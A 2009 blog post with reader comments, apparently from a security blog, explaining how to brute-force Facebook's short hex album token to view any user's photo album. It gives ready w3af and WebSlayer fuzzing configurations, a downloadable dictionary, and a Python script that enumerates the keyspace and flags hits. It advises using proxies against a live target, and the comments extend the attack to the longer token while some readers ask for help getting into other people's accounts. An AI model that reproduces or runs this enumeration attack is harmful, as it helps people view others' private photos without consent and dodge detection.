Facebook Hack – Access Any Users Photo Albums
- March 12th, 2009
- Posted in Featured

Dave from Security Ninja shows how you can brute-force a single URL parameter with Burp Suite and gain access to any user's Facebook photo album. Here are the basics:
Access to an album on Facebook is controlled by three parameters in the URL; you can see them here:
http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c
aid=-3 (-3 for every public profile album, so it is the same for everyone)
id=0123456789 (the target's user id, obtained by searching for the user and hovering over the "Add as Friend" button)
l=? (all we know is that it is 5 characters from the range 0123456789abcdef, i.e. 16^5 = 1,048,576 possible values)
In other words, the first two parameters are public, so the only thing standing between you and the album is a 5-character hex token, and nothing stops you from simply trying all of them.
Dave uses Burp Suite, but there are many ways you can go about it. I think a pre-generated dictionary of all possible values might be marginally faster (untested), so I'll use that.
First, one of my favorite methods: w3af's Fuzzy Requests and Clustered Response tools.
GET http://www.facebook.com/album.php?aid=-3&id=targetsid&l=$[l.strip() for l in file('fbhex.dic').readlines()]$ HTTP/1.0
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Here’s the dictionary (1.1MB, zipped), extract it to your w3af directory.
After the run finishes, run the Cluster tool and wait. The error pages all cluster together, and the one valid album page should show up far away from the rest of them.
Another tool that could be used for this is Edge Security’s WebSlayer:
URL:
http://www.facebook.com/album.php?aid=-3&id=targetsid&l=FUZZ
Set it to ignore responses with the error page's line count so you can find your valid request faster. Currently the error page contains 71 lines, but this may be different for you: run the scan for a few seconds, look at the number of lines each error page contains, stop the scan, enter that number in the ignore-lines box and start again.

Other useful features of WebSlayer are the ability to control the rate and set proxy options.
There are likely MANY other tools you can use to accomplish this task, but these seem to be the simplest.
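Here is an added example (my own illustration for this post, not Dave's Burp Suite setup and not the w3af or WebSlayer configurations above) that does in plain Python what those tools hide: it generates the 16^5 hex dictionary, runs candidates through a fetch function, and picks out the one response whose line count differs from the error page, which is exactly the "ignore lines" / clustering trick. It also covers the follow-up case raised in the comments below, where l= grew to 10 characters but the new value is the old one with 5 characters appended. The album.php endpoint is replaced by a constructed stand-in (the page bodies are made up, not captured Facebook output), and the user id and l= value are taken from the example URL in the post purely as labels.

```python
"""Brute-forcing a short hex token in a URL parameter and spotting the one different response.

Added example for this post; not Dave's Burp Suite setup nor the w3af/WebSlayer configuration.
It runs offline against a constructed stand-in for the album.php endpoint.
"""
import itertools
from collections import Counter
from typing import Callable, Dict, Iterable, Iterator, List

HEX = "0123456789abcdef"
# URL shape copied from the post; aid=-3 is the public profile album, id is the target's user id.
ALBUM_URL = "http://www.facebook.com/album.php?aid=-3&id={uid}&l={l}"


def keyspace(width: int, alphabet: str = HEX) -> Iterator[str]:
    """Every string of `width` characters over `alphabet`, in lexical order (what fbhex.dic holds)."""
    for chars in itertools.product(alphabet, repeat=width):
        yield "".join(chars)


def keyspace_size(width: int, alphabet: str = HEX) -> int:
    """Number of candidates: 16**5 = 1,048,576 for the original l=, 16**10 once it grew to 10 chars."""
    return len(alphabet) ** width


def write_dictionary(path: str, width: int = 5) -> int:
    """Write one candidate per line (the format the w3af request reads from fbhex.dic); returns the count."""
    n = 0
    with open(path, "w") as fh:
        for word in keyspace(width):
            fh.write(word + "\n")
            n += 1
    return n


def extended_keyspace(known_prefix: str, extra: int) -> Iterator[str]:
    """Follow-up case from the comments: the new l= is the old value with `extra` characters appended,
    so someone who already knows the old value has only 16**extra candidates left, not 16**10."""
    for suffix in keyspace(extra):
        yield known_prefix + suffix


def find_outliers(responses: Dict[str, str]) -> List[str]:
    """WebSlayer's 'ignore lines' idea: the error page always has the same line count (71 in the post),
    so the most common line count is the error baseline and anything else is a candidate hit."""
    counts = {cand: len(body.splitlines()) for cand, body in responses.items()}
    baseline = Counter(counts.values()).most_common(1)[0][0]
    return sorted(c for c, n in counts.items() if n != baseline)


def probe(uid: str, candidates: Iterable[str], fetch: Callable[[str], str], error_lines: int) -> List[str]:
    """Streaming version for a real run: fetch each candidate URL with `fetch` (urllib through a proxy,
    at a sane rate) and keep only those whose response line count differs from the known error page."""
    hits = []
    for cand in candidates:
        body = fetch(ALBUM_URL.format(uid=uid, l=cand))
        if len(body.splitlines()) != error_lines:
            hits.append(cand)
    return hits


def make_fake_album_endpoint(valid_l: str, error_lines: int = 71) -> Callable[[str], str]:
    """Constructed stand-in (an assumption, not captured Facebook output): a fixed 71-line error page
    for every wrong l=, and a shorter album page for the right one."""
    error_page = "\n".join(["<html>", "<body>", "Sorry, that page does not exist."]
                           + ["<!-- error page filler -->"] * (error_lines - 4)
                           + ["</body></html>"])
    album_page = "\n".join(["<html>", "<body>"]
                           + ['<img src="photo%d.jpg">' % i for i in range(12)]
                           + ["</body></html>"])

    def fetch(url: str) -> str:
        return album_page if url.rsplit("&l=", 1)[1] == valid_l else error_page

    return fetch


if __name__ == "__main__":
    # "aad9c" and 1508034566 are the values in the post's example URL, used here only as labels.
    fetch = make_fake_album_endpoint("aad9c")
    print("candidates for width 5: %d, width 10: %d" % (keyspace_size(5), keyspace_size(10)))
    # Sample a handful of responses to learn the error page's line count, as the post suggests.
    sample = {c: fetch(ALBUM_URL.format(uid="1508034566", l=c)) for c in itertools.islice(keyspace(5), 20)}
    error_lines = Counter(len(b.splitlines()) for b in sample.values()).most_common(1)[0][0]
    print("error page has %d lines" % error_lines)
    # Full run over the 16**5 keyspace against the stand-in (about a second locally).
    print("hits:", probe("1508034566", keyspace(5), fetch, error_lines))
```

Against a live target the only piece that changes is `fetch`: wrap urllib with your proxy and a delay, because a million requests from one address in a short time is exactly what gets an account or IP banned. The line-count distinguisher is deliberately crude; if the error page ever varies in length you will get false positives, which is why the post tells you to sample the error page first rather than hard-code 71.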
Good luck, and remember:

Check out Dave’s post for the Burp Suite method he uses to generate the needed parameter.
Hi there!
Thanks for the positive words. I like your approach using the cluster tool, I imagine any tool that could automate requests would be fine to use here.
I wonder if there is a speed benefit to using a specific tool?
I also like your gtfo image; if it wasn't for the fact that my original presentation was aimed at a professional audience, I would have gone and found a lovely lady to be my test user.
Dave
Sometimes I pride myself on being the filter between the pros and the kiddies… and sometimes not.
I didn't really go through with the full scan for fear of being banned (and a lack of a good proxy), but it seemed to me that WebSlayer combined with the dictionary provided much faster results than w3af, though w3af is kind of shoehorned into working on Windows whereas WebSlayer seems to be native across the board. Results may be better with something like Psyco added to w3af running on a processor-specific Linux compile.
Your dictionary file is an invalid zip archive…
Where are you guys finding the slowness in w3af? In the clustering, or in the HTTP request sending?
@as
Sorry about that, should be fine now.
@Andres
HTTP requests seem to be about half the speed of WebSlayer, and clustering is slow because it's processing over 1 million requests.
Great, another nosy Parker!!!
Your zip files can't be downloaded.
Fixed again… I hate WordPress sometimes.
Thanks.
It seems Facebook now uses a 10-character width for the l=? parameter. Is there an updated dictionary out there, by any wild chance?
And nukeit, as you mention a lack of a good proxy, would you recommend against trying this out without one? Do you really think they'll ban users for seeking out legitimate links?
Ha, that’s what I figured. It would be like 16^10 right?
Hi Yeck79,
I did post a follow-up on my blog with regards to the change in the l= parameter (http://securityninja.co.uk/blog/?p=228). Basically Facebook took the old l= parameter and added 5 digits on the end.
In short, if you exploited the flaw previously (i.e. you know the old l= number) you can run the same attack to brute-force the new 5 digits. It's not that likely, but hey, if you ran out when I first published it and found the profile of a lovely lady and still want to access those pictures…….
Have fun!
SN
Good article. I'm not such a FB fan, but it might come in handy.
Hi, I'm looking to get into a Facebook and Hotmail account. Can anyone help?
wow, how lazy of them…
Did you get any reply?
Hey, I was testing this method in WebSlayer, but when I tried to use a payload that now has a width of 10, in a permutation, and I put the charset as 0123456789abcdef, the program does not create the temporal generator (and instead takes minutes to do nothing) that we need in order to create a payload. I thought that maybe it's because of the width of the permutation, because I tried with a width of 5 and it worked fine, but as you know FB now uses 10 chars in the "l" parameter. So I want to ask somebody who uses WebSlayer if you know the reason for this problem, or maybe a way to solve it. Thanks… and nukeit, thanks for the initial knowledge.
I’ve just about given up on webslayer support. I don’t think the devs are around anymore, and the fact that they never released source kinda makes me worried about the safety of their binaries.
Hi There
I am not able to view anyone's photo album. If someone can help me out to do so, is it possible to read photo comments also? Please help me, I need it on an urgent basis.
John
Now every Facebook pic has a link address (pid number) and also an image address:
http://profile.ak.facebook.com/v222/267/42/nXXXXXXXXX_4215.jpg
I know of a person whose profile wasn't private, so I know the image address of her profile pic; then she made it all private so that now it doesn't show up even in search, but the old profile pic still opens.
With WebSlayer, you can find the photo or album part by forcing the pid or aid numbers. But with the image address I don't know exactly how to proceed; there are so many numbers involved. Has anyone ever done this before, or does anyone know what all those numbers are?
Have a look at theharmonyguy’s bookmarklet:
halooooooooooooooo
The dictionary would be huge… and would take over a month if you were running it from the server itself